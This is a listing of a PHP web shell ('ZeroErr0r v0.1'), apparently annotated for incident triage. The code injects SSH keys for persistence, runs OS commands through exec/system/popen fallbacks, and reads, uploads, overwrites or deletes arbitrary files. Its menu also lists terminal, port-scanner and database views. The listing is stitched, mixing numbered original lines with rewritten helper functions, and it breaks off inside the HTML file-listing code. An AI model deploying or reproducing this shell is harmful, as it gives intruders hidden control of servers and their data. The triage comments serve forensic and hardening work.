1 | <?php | |
// Login handling of a PHP web shell. This listing is an intrusion artifact, annotated for triage.
// Incident-response note: the request handlers that follow in this file are not wrapped in a
// session check; the only later use of $_SESSION['password'] visible in this listing is the
// isset() test in front of the HTML interface. A host carrying this file should be treated as
// exposed to anyone who could reach its URL, not only to whoever planted it.
2 | session_start(); | |
// error_reporting(0) switches PHP error reporting off for the request, so failures in the code
// below should not be expected to show up in the PHP error log.
3 | error_reporting(0); | |
4 | if (isset($_POST['password'])) { | |
// The expected hash literal is empty in this copy. md5() always returns 32 hex characters, so
// the comparison cannot succeed as shown; presumably the real hash was removed before the paste
// was published. The check itself is an unsalted MD5 compared with loose ==.
5 | if (md5($_POST['password']) == '') { | |
// On a match the submitted password is kept in the session in plaintext.
6 | $_SESSION['password'] = $_POST['password']; | |
7 | header("Location: ?"); | |
8 | } else { | |
// Neither branch stops after header(), so the rest of the script still runs for this request.
9 | header("Location: ?"); | |
10 | } | |
11 | } | |
12 | ||
// SSH key handler: a persistence mechanism. It appends the posted 'pub_key' value, unvalidated,
// to .ssh/authorized_keys in the parent directory of DOCUMENT_ROOT, creating .ssh when absent.
// Triage: deleting this PHP file does not undo a key written here. Review authorized_keys (and a
// freshly created .ssh directory) in the parent of the web root for entries nobody can account
// for, and line their modification times up with web-server log entries for this script.
13 | // ssh key injector | |
14 | if (isset($_POST['inject_key'])) { | |
15 | $key = $_POST['pub_key']; | |
16 | ||
17 | // TODO: make this method works on windows servers | |
18 | // this is only for linux server | |
// The target directory is derived from the server configuration, not from the request.
19 | chdir($_SERVER['DOCUMENT_ROOT'] . "/.."); | |
20 | if (file_exists(getcwd() . "/.ssh")) { | |
21 | if (!is_writable((getcwd() . '/.ssh'))) { | |
// Every outcome is reported through a redirect carrying base64 text in 'msg'; the follow-up GET
// with view=injector&action=ssh&msg=... is therefore what appears in access logs.
22 | header("Location: ?view=injector&action=ssh&msg=" . base64_encode("permission denied")); | |
23 | die(); | |
24 | } | |
25 | } else { | |
26 | if (!is_writable(getcwd())) { | |
27 | header("Location: ?view=injector&action=ssh&msg=" . base64_encode("permission denied")); | |
28 | die(); | |
29 | } | |
// mkdir() is called without a mode argument, so the directory gets PHP's default mode (subject
// to the process umask).
30 | mkdir(getcwd() . "/.ssh"); | |
31 | } | |
32 | ||
// "a+" appends: existing keys are kept and the posted text is written as received.
33 | $key_file = fopen(getcwd() . "/.ssh/authorized_keys", "a+"); | |
34 | fwrite($key_file, $key); | |
35 | fclose($key_file); | |
// Restores the working directory from the session value set by the 'cd' handler.
36 | chdir($_SESSION['cd']); | |
37 | header("Location: ?view=injector&action=ssh&msg=" . base64_encode("ssh key injected successfully!")); | |
38 | } | |
39 | ||
// Sends the file named by $filename to the client as an attachment and exits; redirects with an
// error message when the file does not exist; does nothing for an empty name.
// $path is the empty string, so $filename is used exactly as given: there is no base directory
// and no path normalisation, and any file the PHP process can read can be sent.
// Triage: treat files readable by the web-server account as potentially copied off the host;
// the caller below passes the 'view' query parameter when action=download, so the requested
// paths are visible in access logs.
40 | function download($filename){ | |
41 | if(!empty($filename)){ | |
42 | // Specify file path. | |
43 | $path = ''; // '/uplods/' | |
44 | $download_file = $path.$filename; | |
45 | // Check file is exists on given path. | |
46 | if(file_exists($download_file)) { | |
47 | // Getting file extension. | |
48 | $extension = explode('.',$filename); | |
49 | $extension = $extension[count($extension)-1]; | |
50 | // For Gecko browsers | |
51 | header('Content-Transfer-Encoding: binary'); | |
// NOTE(review): filemtime() is given $path (the empty prefix), not $download_file, so this
// header does not reflect the file being sent.
52 | header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . ' GMT'); | |
53 | // Supports for download resume | |
54 | header('Accept-Ranges: bytes'); | |
55 | // Calculate File size | |
56 | header('Content-Length: ' . filesize($download_file)); | |
57 | header('Content-Encoding: none'); | |
58 | // Change the mime type if the file is not PDF | |
// The MIME type is simply "application/" plus whatever follows the last dot in the name.
59 | header('Content-Type: application/'.$extension); | |
60 | // Make the browser display the Save As dialog | |
// The file name is placed in the header unquoted and unfiltered.
61 | header('Content-Disposition: attachment; filename=' . $filename); | |
62 | readfile($download_file); | |
63 | exit; | |
64 | } | |
65 | else { | |
66 | header("Location: ?msg=" . base64_encode('File does not exists on given path')); | |
67 | } | |
68 | ||
69 | } | |
70 | } | |
71 | ||
// Download dispatch: with action=download the 'view' query parameter is handed to download()
// unchanged. This runs before the login form further down is reached.
72 | if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'download') { | |
73 | download($_GET['view']); | |
74 | } | |
75 | ||
// Logout: destroys the session, redirects to the bare URL and stops.
76 | if (isset($_GET['action']) AND $_GET['action'] == 'logout') { | |
77 | session_destroy(); | |
78 | header("Location: ?"); | |
79 | die(); | |
80 | } | |
81 | ||
82 | ||
// Recursively deletes $dirname: files are unlinked, sub-directories are handled by recursion,
// then the directory itself is removed. Returns false when no directory handle was obtained,
// true otherwise; the results of unlink() and rmdir() are not checked.
// Triage: nothing is logged here, so deletions by this tool have to be reconstructed from
// backups, filesystem timestamps and the request parameters recorded in access logs.
83 | function delete_directory($dirname) { | |
// NOTE(review): without braces the is_dir() test guards only the opendir() line; for a path
// that is not a directory $dir_handle is never assigned and the function returns false below.
84 | if (is_dir($dirname)) | |
85 | $dir_handle = opendir($dirname); | |
86 | if (!$dir_handle) | |
87 | return false; | |
// NOTE(review): the loop condition is a truthiness test, so it also ends at an entry whose
// name PHP treats as false (for example "0").
88 | while($file = readdir($dir_handle)) { | |
89 | if ($file != "." && $file != "..") { | |
90 | if (!is_dir($dirname."/".$file)) | |
91 | unlink($dirname."/".$file); | |
92 | else | |
93 | delete_directory($dirname.'/'.$file); | |
94 | } | |
95 | } | |
96 | closedir($dir_handle); | |
97 | rmdir($dirname); | |
98 | return true; | |
99 | } | |
100 | ||
// Directory-change and delete handlers. Paths arrive base64-encoded in the query string.
// Triage: these handlers write no log of their own, but the base64 values recorded in access
// logs decode to the affected paths and can be used to rebuild a timeline of what was touched.
//
// 'cd': stores the decoded value as the session working directory, without validation; it is
// passed to chdir() later in the script.
101 | if (isset($_GET['cd'])) { | |
102 | $_SESSION['cd'] = base64_decode($_GET['cd']); | |
103 | } | |
104 | ||
// 'rmdir': resolves the decoded path with realpath() and removes it recursively through
// delete_directory(). realpath() only canonicalises; it does not confine the path to any root.
105 | if (isset($_GET['rmdir'])) { | |
106 | $file = realpath(base64_decode($_GET['rmdir'])); | |
107 | if (file_exists($file)) { | |
108 | if (is_writable($file)) { | |
109 | delete_directory($file); | |
110 | header("Location: ?msg=" . base64_encode($file . " has been deleted!")); | |
111 | } else { | |
112 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
113 | } | |
114 | } | |
115 | } | |
// 'rmfile': same shape as above, for a single file removed with unlink().
116 | if (isset($_GET['rmfile'])) { | |
117 | $file = realpath(base64_decode($_GET['rmfile'])); | |
118 | if (file_exists($file)) { | |
119 | if (is_writable($file)) { | |
120 | unlink($file); | |
121 | header("Location: ?msg=" . base64_encode($file . " has been deleted!")); | |
122 | } else { | |
123 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
124 | } | |
125 | } | |
126 | } | |
127 | ||
// 'multirmfile': the value is a count; the paths are read from parameters named rmfile0,
// rmfile1, ... Directories go through rmdir() here (not the recursive helper), files through
// unlink(). A header() call is issued per entry; the last one sent decides the redirect.
128 | if (isset($_GET['multirmfile'])) { | |
129 | for ($i = 0; $i < intval($_GET['multirmfile']); $i++) { | |
130 | $file = realpath(base64_decode($_GET['rmfile' . $i])); | |
131 | if (file_exists($file)) { | |
132 | if (is_writable($file)) { | |
133 | if (is_dir($file)) { | |
134 | rmdir($file); | |
135 | } else { | |
136 | unlink($file); | |
137 | } | |
138 | header("Location: ?msg=" . base64_encode("selected file(s) has been deleted!")); | |
139 | } else { | |
140 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
141 | } | |
142 | } | |
143 | } | |
144 | } | |
145 | ||
// Applies the session working directory; every relative path used after this point resolves
// against a value that came from the request ('cd' handler).
146 | if (isset($_SESSION['cd'])) { | |
147 | chdir($_SESSION['cd']); | |
148 | } | |
149 | ||
// Rename handler: 'from' is base64-decoded and used as given; 'to' is taken raw and appended to
// the current working directory, so it is not limited to a bare file name.
// Triage: a rename changes a file's name or location without changing its content; when hunting
// for dropped files, match on content hashes as well as on names.
150 | if (isset($_GET['to']) AND isset($_GET['from'])) { | |
151 | $from = base64_decode($_GET['from']); | |
152 | $to = $_GET['to']; | |
153 | ||
// NOTE(review): is_writable() is tested before file_exists(); a missing file presumably fails
// the first test already, so the "file doesn't exist" message looks unreachable -- confirm.
154 | if (is_writable($from)) { | |
155 | if (file_exists($from)) { | |
156 | rename($from, getcwd() . '/' . $to); | |
157 | header('Location: ?msg=' . base64_encode("file renamed successfully!")); | |
158 | } else { | |
159 | header("Location: ?msg=" . base64_encode("file doesn't exist")); | |
160 | } | |
161 | } else { | |
162 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
163 | } | |
164 | } | |
165 | ||
/**
 * Render a byte count as a short human-readable string.
 *
 * Values of 1024 and above are scaled to KB, MB or GB (binary multiples) with two
 * decimals; values from 1 up to 1023 are shown as "<n> B"; anything else is "0 B".
 *
 * @param int|float $bytes Size in bytes.
 * @return string Formatted size, e.g. "1.50 KB".
 */
function formatSizeUnits($bytes) {
    // Largest unit first so the first matching threshold wins.
    $scales = array(
        1073741824 => ' GB',
        1048576    => ' MB',
        1024       => ' KB',
    );

    foreach ($scales as $threshold => $suffix) {
        if ($bytes >= $threshold) {
            return number_format($bytes / $threshold, 2) . $suffix;
        }
    }

    // Below one KB the raw value is printed unchanged.
    if ($bytes > 1 || $bytes == 1) {
        return $bytes . ' B';
    }

    return '0 B';
}
/**
 * Turn a numeric file mode (as returned by fileperms()) into a ten-character
 * "ls -l"-style string.
 *
 * The first character is the file type: s socket, l symlink, r regular file,
 * b block device, d directory, c character device, p FIFO, u unknown. It is
 * followed by the owner, group and world triads, with s/S for setuid and setgid
 * and t/T for the sticky bit.
 *
 * @param int $perms Mode bits.
 * @return string Ten-character permission string.
 */
function formatPerms($perms) {
    $typeLetters = array(
        0xC000 => 's', // socket
        0xA000 => 'l', // symbolic link
        0x8000 => 'r', // regular
        0x6000 => 'b', // block special
        0x4000 => 'd', // directory
        0x2000 => 'c', // character special
        0x1000 => 'p', // FIFO pipe
    );
    $typeBits = $perms & 0xF000;
    $info = isset($typeLetters[$typeBits]) ? $typeLetters[$typeBits] : 'u';

    // read bit, write bit, execute bit, special bit, letter with execute, letter without
    $triads = array(
        array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner / setuid
        array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group / setgid
        array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world / sticky
    );

    foreach ($triads as $triad) {
        list($readBit, $writeBit, $execBit, $specialBit, $withExec, $withoutExec) = $triad;

        $info .= ($perms & $readBit) ? 'r' : '-';
        $info .= ($perms & $writeBit) ? 'w' : '-';

        if ($perms & $execBit) {
            $info .= ($perms & $specialBit) ? $withExec : 'x';
        } else {
            $info .= ($perms & $specialBit) ? $withoutExec : '-';
        }
    }

    return $info;
}
/**
 * Return the last-modification time of a path formatted as "M-d-Y H:i:s".
 *
 * @param string $filename Path to inspect.
 * @return string|null Formatted timestamp, or null when the path does not exist.
 */
function modifiedDate($filename) {
    if (!file_exists($filename)) {
        return null;
    }

    $modifiedAt = filemtime($filename);

    return date("M-d-Y H:i:s", $modifiedAt);
}
231 | ||
// Runs $in as an operating-system command and returns whatever it printed, as a string.
// It uses the first of exec, passthru, system and shell_exec that function_exists() reports,
// with popen() as the last resort; '@' hides the warnings these calls may raise.
// Hardening: each branch is only a fallback for the one before it, so restricting a single
// function leaves the others usable. A disable_functions policy has to cover all five named
// here to stop this helper (how function_exists() reports a disabled function depends on the
// PHP version -- confirm on the target build).
// Detection: the visible effect on the host is the web server's PHP process starting shell
// child processes, which process-creation auditing can alert on.
232 | function ex($in) { | |
233 | $out = ''; | |
234 | if(function_exists('exec')) { | |
// exec() fills $out with an array of output lines; they are joined back with newlines.
235 | @exec($in,$out); | |
236 | $out = @join("\n",$out); | |
237 | }elseif(function_exists('passthru')) { | |
// passthru() and system() print directly, so output buffering is used to capture the text.
238 | ob_start(); | |
239 | @passthru($in); | |
240 | $out = ob_get_clean(); | |
241 | }elseif(function_exists('system')) { | |
242 | ob_start(); | |
243 | @system($in); | |
244 | $out = ob_get_clean(); | |
245 | }elseif(function_exists('shell_exec')) { | |
246 | $out = shell_exec($in); | |
247 | }elseif(is_resource($f = @popen($in,"r"))) { | |
248 | $out = ""; | |
249 | while(!@feof($f)) | |
250 | $out .= fread($f,1024); | |
251 | pclose($f); | |
252 | } | |
253 | return $out; | |
254 | } | |
255 | ||
// Looks up a program with the shell's `which` through ex(). Returns the command output when it
// is non-empty, false otherwise.
// $p is concatenated into the command line without escaping; the callers visible in this
// listing pass fixed strings ("python", "tar", "perl").
256 | function which($p) { | |
257 | $path = ex('which '.$p); | |
258 | if(!empty($path)) | |
259 | return $path; | |
260 | return false; | |
261 | } | |
262 | ||
// File-write handlers. None of them restricts the target path to a base directory.
// Triage: any file writable by the web-server account may have been altered or created;
// compare the web root against a known-good deployment rather than relying on timestamps alone.
//
// 'edit': overwrites the file named in POST 'dest' with POST 'content' (mode 'w' truncates).
263 | if (isset($_POST['edit'])) { | |
264 | if (is_writable($_POST['dest'])) { | |
265 | $file = fopen($_POST['dest'], 'w'); | |
266 | fwrite($file, $_POST['content']); | |
267 | fclose($file); | |
268 | header('Location: ?msg=' . base64_encode("file saved!")); | |
269 | } else { | |
270 | header('Location: ?msg=' . base64_encode("permission denied!")); | |
271 | } | |
272 | } | |
273 | ||
// 'touch': creates an empty file named by 'file' inside the base64-decoded 'touch' directory.
// Mode "wb" truncates, so an existing file of that name is emptied.
// NOTE(review): the writability test is applied to dirname() of the decoded directory, i.e. to
// its parent, not to the directory that is actually written to.
274 | if (isset($_GET['touch']) AND isset($_GET['file'])) { | |
275 | if (is_writable(dirname(base64_decode($_GET['touch'])))) { | |
276 | $content = ""; | |
277 | $fp = fopen(base64_decode($_GET['touch']) . '/' . $_GET['file'],"wb"); | |
278 | fwrite($fp,$content); | |
279 | fclose($fp); | |
280 | header("Location: ?msg=" . base64_encode($_GET['file'] . " has been created!")); | |
281 | } else { | |
282 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
283 | } | |
284 | } | |
285 | ||
// 'mkdir_path' + 'folder': creates a directory; the same parent-directory check as above.
286 | if (isset($_GET['mkdir_path']) AND isset($_GET['folder'])) { | |
287 | if (is_writable(dirname(base64_decode($_GET['mkdir_path'])))) { | |
288 | mkdir(base64_decode($_GET['mkdir_path']) . '/' . $_GET['folder']); | |
289 | header("Location: ?msg=" . base64_encode($_GET['folder'] . " folder has been created!")); | |
290 | } else { | |
291 | header("Location: ?msg=" . base64_encode("permission denied!")); | |
292 | } | |
293 | } | |
294 | ||
// Upload handler: moves the uploaded file into the directory given in POST 'path', under the
// name supplied by the client. There is no check on extension or content type, and the
// "already exists" check is commented out, so an existing file of the same name is replaced.
// Triage: look for files that appeared in directories writable by the web-server account
// around the time of POST requests to this script, with particular attention to script files.
295 | if (isset($_POST['upload'])) { | |
296 | if (is_writable($_POST['path'])) { | |
// '@' hides the notice raised when no file part was sent.
297 | $files = @$_FILES["files"]; | |
298 | $fullpath = $_POST['path'] . "/" . $files["name"]; | |
299 | ||
300 | // if (file_exists($fullpath)) { | |
301 | // header("Location: ?msg=" . base64_encode("file already exist!")); | |
302 | // die(); | |
303 | // } | |
304 | ||
305 | if ($files["name"] != '') { | |
306 | if (move_uploaded_file($files['tmp_name'], $fullpath)) { | |
// The destination path is echoed back, base64-encoded, in the 'msg' parameter of the redirect,
// so it is recoverable from the access-log entry of the follow-up GET.
307 | header("Location: ?msg=" . base64_encode("file uploaded to $fullpath")); | |
308 | } else { | |
309 | header("Location: ?msg=" . base64_encode("an error occured!")); | |
310 | } | |
311 | } | |
312 | } else { | |
// NOTE(review): base64_decode() is applied to plain text here, so the message sent is not the
// literal "permission denied!" -- looks like a bug in the original.
313 | header("Location: ?msg=" . base64_encode(base64_decode('permission denied!'))); | |
314 | } | |
315 | } | |
316 | ||
// Path bar: a POSTed 'qpath' is turned into a redirect to the 'cd' handler.
317 | if ($_SERVER['REQUEST_METHOD'] == 'POST' AND isset($_POST['qpath'])) { | |
318 | header("Location: ?cd=" . base64_encode($_POST['qpath'])); | |
319 | } | |
320 | ||
321 | ||
322 | ||
// Archive handler: creates (or opens) "<name of current directory>.zip" inside the session
// working directory and adds the listed entries that are not directories. 'numfiles' is a
// count; the paths come base64-encoded in parameters named file0, file1, ...
// Triage: despite the success message, nothing in this block sends the archive to the client;
// it stays on disk. An unexpected .zip named after its containing directory is a sign of data
// being staged for later retrieval.
323 | if (isset($_GET['action']) AND isset($_GET['numfiles']) AND $_GET['action'] == 'zip') { | |
324 | $zip = new ZipArchive(); | |
325 | chdir($_SESSION['cd']); | |
// The directory name is taken as the last path component, split on the platform separator.
326 | if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { | |
327 | $tmp = explode('\\', getcwd()); | |
328 | } else { | |
329 | $tmp = explode('/', getcwd()); | |
330 | } | |
331 | ||
332 | if($zip->open(getcwd() . "/" . $tmp[count($tmp) - 1] . ".zip", ZipArchive::CREATE) === TRUE) { | |
333 | for ($i = 0; $i < intval($_GET['numfiles']); $i++) { | |
334 | // $zip->addFromString(basename(getcwd() . '/cx.txt'), file_get_contents(getcwd() . '/cx.txt')); | |
335 | $file = base64_decode($_GET['file' . $i]); | |
336 | if (!is_dir($file)) { | |
// Only the base name is passed on, so the file is looked up in the current working directory.
337 | $zip->addFile(basename($file)); | |
338 | } | |
339 | } | |
340 | $zip->close(); | |
341 | ||
342 | header("Location: ?msg=" . base64_encode("selected files has been compressed and downloaded.")); | |
343 | } else { | |
// NOTE(review): output is echoed before header(); unless output buffering is on, the redirect
// header can presumably no longer be sent at this point.
344 | echo "Failed!"; | |
345 | header("Location: ?msg=" . base64_encode("failed to create a zip file")); | |
346 | } | |
347 | } | |
348 | ||
349 | ?> | |
350 | ||
351 | <!DOCTYPE html> | |
352 | <html> | |
353 | <head> | |
354 | <meta charset="utf-8"> | |
355 | <title>- ZerroErr0r v0.1</title> | |
356 | <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css"> | |
357 | <style type="text/css"> | |
358 | .hljs{display:block;overflow-x:auto;padding:.5em;background:#071414;color:#e6e1dc}.hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}.hljs-keyword,.hljs-selector-tag{color:#c26230}.hljs-number,.hljs-regexp,.hljs-string,.hljs-template-variable,.hljs-variable{color:#a5c261}.hljs-subst{color:#519f50}.hljs-name,.hljs-tag{color:#e8bf6a}.hljs-type{color:#da4939}.hljs-attr,.hljs-built_in,.hljs-builtin-name,.hljs-bullet,.hljs-link,.hljs-symbol{color:#6d9cbe}.hljs-params{color:#d0d0ff}.hljs-attribute{color:#cda869}.hljs-meta{color:#9b859d}.hljs-section,.hljs-title{color:#ffc66d}.hljs-addition,.hljs-deletion{color:#e6e1dc;display:inline-block;width:100%}.hljs-addition{background-color:#144212}.hljs-deletion{background-color:#600}.hljs-selector-class{color:#9b703f}.hljs-selector-id{color:#8b98ab}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700}.hljs-link{text-decoration:underline} | |
359 | </style> | |
360 | ||
361 | <script type="text/javascript"> | |
362 | window.addEventListener('load', function() { | |
363 | var boxes = document.getElementsByClassName('box'); | |
364 | for (var i = 0; i < boxes.length; i++) { | |
365 | boxes[i].innerHTML += "<span class='c1'></span><span class='c2'></span><span class='c3'></span><span class='c4'></span>"; | |
366 | } | |
367 | }, false); | |
368 | </script> | |
369 | ||
370 | <style type="text/css"> | |
371 | @import url(https://fonts.googleapis.com/css?family=Electrolize);body,h1,h2,h3,h4,h5,nav ul{margin:0;padding:0}nav li a,nav li a:hover{transition:all .2s ease}nav li a,section a{text-decoration:none}nav li,nav li a{display:inline-block}.logo span,body,form textarea,section a:hover{color:#AAA}.error,footer{text-align:right}body{background-color:#071414;font-family:Electrolize,monospace,sans-serif,arial}header{padding:20px;border:1px solid #BBB;margin:20px}header .logo{float:left;position:relative;top:3px}header .info{float:right;text-transform:uppercase}.logo span{opacity:.7}nav{padding:0 20px;}nav li a{padding:4px 15px;color:#E3052B;}nav li a:hover{text-decoration: line-through;}section{margin:20px;border:1px solid #E3052B;}section .content{padding:20px}section .title{background-color:#0E1A1F;padding:10px 20px;border-bottom:1px solid #85001A}section table{width:100%}section table td{padding:5px 15px}section table .td_head td{padding:0 15px 20px;text-transform:uppercase}section table tr:hover{background-color:#1A272E}section table tr:first-child:hover{background-color:transparent}section a{color:#EF330E}.error{padding:10px 20px;background-color:#E3052B; text-align:center;color:#EEE;}img{max-width:100%}pre{overflow:auto}pre code{font-size:1rem}form textarea{width:100%;display:block;border:none;height:500px;background-color:transparent;resize:none;font-size:1.2rem;outline:0}form input[type=submit],form select{padding:5px 20px;font-family: 'Electrolize', monospace;border:1px solid #E3052B;display:inline-block;margin-top:20px;font-size:1rem;background-color:transparent;color:#E3052B;cursor:pointer;outline:none;}form select{background-color:#071414;outline:0}form input[type=submit]:hover{background-color:#85001A;color:#AAA}form 
input[type=text]{border:none;background-color:transparent;font-size:1.1rem;width:80%;outline:0;color:#EF330E;font-family:monospace}.light_red{color:#E3052B}.dark_red{color:#85001A}.orange{color:#EF330E}.light_black{color:#0E1A1F}.dark_black{color:#071414}.clearfix:after{content:'';display:table;clear:both}::-webkit-scrollbar{width:8px}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px}::-webkit-scrollbar-thumb{background-color:#85001a}footer{padding:20px;opacity:.2}.result{margin-top:20px;padding:10px;background-color:#1A272E}#login input{background-color:transparent;border:1px solid #E3052B;width:100%;box-sizing:border-box;padding:10px 20px;display:block;margin-top:5px;color:#E3052B;outline:0}#login{width:300px;}#login input[type=submit]{margin-top:15px}#login input[type=submit]:hover{background-color:#85001A;color:#AAA}form .title{border: none;width: 100%;color:#AAA;font-size: 1.1rem;font-family: 'Electrolize', monospace; box-sizing: border-box;border-bottom: 1px solid #E3052B; outline: none;}.box { border: 2px solid #85001A; }.box .c1, .box .c2, .box .c3, .box .c4 { display: block; position: absolute; width: 5px; height: 3px; background-color: #EEE; }.box .c1 { top: -2px; left: -2px; }.box .c2 { top: -2px; right: -2px; }.box .c3 { bottom: -2px; right: -2px; }.box .c4 { bottom: -2px; left: -2px; }header { position: relative; }header .logo p, header .logo{font-weight: lighter;padding: 0;margin: 0;top:0;}section{position: relative;}#login p{margin: 0;}#login{position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%);}#login .content{padding: 20px;}#login .title{padding: 10px 20px;border-color: #85001A;border-width: 2px;}#login .content input {border-color: #85001A;}select {font-family: 'Electrolize', monospace;padding: 0 20px;}pre {white-space: pre-wrap;white-space: -moz-pre-wrap;white-space: -pre-wrap;white-space: -o-pre-wrap;word-wrap: break-word;}.view_action, .action_menu{padding: 10px 
20px;border-bottom:2px solid #85001A;position: relative;}.view_action button, .action_menu button{outline:none;border: 1px solid #E3052B;background-color: transparent;color: #E3052B;padding: 5px 15px;display: inline-block;cursor: pointer;font-family: 'Electrolize', monospace;}.view_action button:hover, .action_menu button:hover{background-color: #85001A;color: #EEE;}.file_select{opacity: 0;}tr:hover .file_select{opacity: 1;}.file_select{margin: 0;padding: 0;cursor: pointer;outline: none;}.action_menu{display: none;}.info_head{padding: 10px 20px;background-color: #85001A;cursor: pointer;margin: 5px 0 0 0;}.server_info table { border:1px solid #85001A;}.server_info table td { border: 0.1px solid #333; }.server_info table tr:hover {background-color: transparent;}.off{display: none;}.port_scanner input[type='text']{display: inline-block; padding: 10px;border:1px solid #E3052B;width: 100%;box-sizing: border-box;}.port_scanner tr:hover{background-color: transparent;}.port_scanner td {padding: 3px 0;} | |
372 | </style> | |
373 | ||
374 | <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.10.0/highlight.min.js"></script> | |
375 | </head> | |
376 | <body> | |
377 | <?php if (!isset($_SESSION['password'])) { ?> | |
378 | ||
379 | <form action="" method="post" id="login" class="box"> | |
380 | <p class="title">PASSWORD</p><br> | |
381 | <div class="content"> | |
382 | <input type="text" name="password" style="-webkit-text-security: square;font-size: 1.3rem; text-align: center;padding: 5px;-webkit-text-security: square;letter-spacing: 3px;padding-bottom: 8px;font-family: 'Electrolize', monospace;" autocomplete="off" spellcheck="false" autofocus> | |
383 | <input type="submit" name="login" value="GET IN!" style="font-family: 'Electrolize', monospace;font-size: 1rem;"> | |
384 | </div> | |
385 | </form> | |
386 | ||
387 | <?php die(); } ?> | |
388 | ||
389 | ||
390 | <header class="clearfix box"> | |
391 | <div class="logo"> | |
392 | <p>ZeroErr0r <span>v0.1</span></p> | |
393 | </div> | |
394 | <div class="info"> | |
395 | Server IP: <?php echo gethostbyname($_SERVER['SERVER_NAME']) ?> | |
396 | </div> | |
397 | </header> | |
398 | <nav> | |
399 | <ul> | |
400 | <li><a href="?">explorer</a></li> | |
401 | <li><a href="?view=evaluate">evaluate</a></li> | |
402 | <li><a href="?view=info">info</a></li> | |
403 | <li><a href="?view=terminal">terminal</a></li> | |
404 | <li><a href="?view=port_scanner">port scanner</a></li> | |
405 | <li><a href="?view=injector">injector</a></li> | |
406 | <li><a href="?view=database">database</a></li> | |
407 | <li><a href="?view=networking">networking</a></li> | |
408 | <li><a href="?action=logout"><i class="fa fa-sign-out"></i> logout</a></li> | |
409 | </ul> | |
410 | </nav> | |
411 | <section class="box"> | |
412 | <?php if (isset($_GET['msg'])) { ?> | |
413 | <div class="error"><?php echo base64_decode($_GET['msg']) ?></div> | |
414 | <?php } ?> | |
415 | ||
416 | <script> | |
417 | function showAction() { | |
418 | var s = document.getElementsByClassName('file_select'); | |
419 | var m = document.getElementsByClassName('action_menu')[0]; | |
420 | for (var i = 0; i < s.length; i++) { | |
421 | if (s[i].checked) { | |
422 | m.style.display = 'block'; | |
423 | break; | |
424 | } else { | |
425 | m.style.display = 'none'; | |
426 | } | |
427 | } | |
428 | } | |
429 | </script> | |
430 | ||
431 | <div class="action_menu"> | |
432 | <button onclick="filesDelete()"><i class="fa fa-trash"></i> Delete</button> | |
433 | <button onclick="filesCompress()"><i class="fa fa-download"></i> Compress</button> | |
434 | </div> | |
435 | ||
436 | <!-- SUB_MENU --> | |
437 | <?php if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?> | |
438 | <div class="view_action"> | |
439 | <a href="?view=<?php echo $_GET['view'] ?>&action=edit"><button><i class="fa fa-pencil"></i> Edit</button></a> | |
440 | <a href="?view=<?php echo $_GET['view'] ?>&action=download"><button><i class="fa fa-download"></i> Download</button></a> | |
441 | <a href="?rmfile=<?php echo base64_encode($_GET['view']) ?>"><button><i class="fa fa-trash"></i> Delete</button></a> | |
442 | <a href="?"><button><i class="fa fa-close"></i> Close</button></a> | |
443 | </div> | |
444 | <?php } ?> | |
445 | <?php if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?> | |
446 | <div class="view_action"> | |
447 | <a href="?view=<?php echo $_GET['view'] ?>"><button><i class="fa fa-asterisk"></i> Basic Injector</button></a> | |
448 | <a href="?view=<?php echo $_GET['view'] ?>&action=ssh"><button><i class="fa fa-exchange"></i> SSH Injector</button></a> | |
449 | </div> | |
450 | <?php } ?> | |
451 | ||
452 | <form action="" method="POST"> | |
453 | <input class="title" value="<?php echo getcwd(); ?>" name="qpath" spellcheck="false" autocomplete="off" style="border-color: #85001A;border-width: 2px;"> | |
454 | </form> | |
455 | <div class="content"> | |
456 | <?php if (!isset($_GET['view'])) { ?> | |
457 | <table> | |
458 | <tr class="td_head"> | |
459 | <td>name</td> | |
460 | <td>size</td> | |
461 | <td>permissions</td> | |
462 | <td>modified</td> | |
463 | <td>action</td> | |
464 | </tr> | |
465 | <?php | |
466 | // echo getcwd() . "<br>"; | |
467 | // chdir(".."); | |
468 | // echo getcwd(); | |
469 | $directories = array(); | |
470 | $files_list = array(); | |
471 | if ($handle = opendir('.')) { | |
472 | ||
473 | while (false !== ($entry = readdir($handle))) { | |
474 | ||
475 | if (is_dir($entry)) { | |
476 | $directories[] = $entry; | |
477 | } else { | |
478 | $files_list[] = $entry; | |
479 | } | |
480 | } | |
481 | ||
482 | closedir($handle); | |
483 | } | |
484 | asort($directories); | |
485 | ||
486 | foreach ($directories as $dir) { | |
487 | if ($dir != "." && $dir != "..") { | |
488 | $size = "Dir"; | |
489 | $perms = formatPerms(fileperms($dir)); | |
490 | $modified = modifiedDate($dir); | |
491 | $link = "?cd=" . base64_encode(getcwd() . "/" . $dir); | |
492 | $del = "?rmdir=" . base64_encode(getcwd() . "/" . $dir); | |
493 | $down_path = getcwd() . "/" . $dir; | |
494 | $path = base64_encode($down_path); | |
495 | // $upload_path = realpath(dirname(__FILE__) . $dir); | |
496 | ||
497 | echo "<tr>"; | |
498 | echo "<td><input type='checkbox' class='file_select' onclick='fileSelectCheck()' value='$path'> <a href='$link'><i class='fa fa-folder'></i> $dir</a></td>"; | |
499 | echo "<td>$size</td>"; | |
500 | echo "<td>$perms</td>"; | |
501 | echo "<td>$modified</td>"; | |
502 | echo "<td class='action'><a href='#' onclick='rename(\"$path\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$down_path&action=upload'>upl</a></td>"; | |
503 | echo "</tr>"; | |
504 | } else { | |
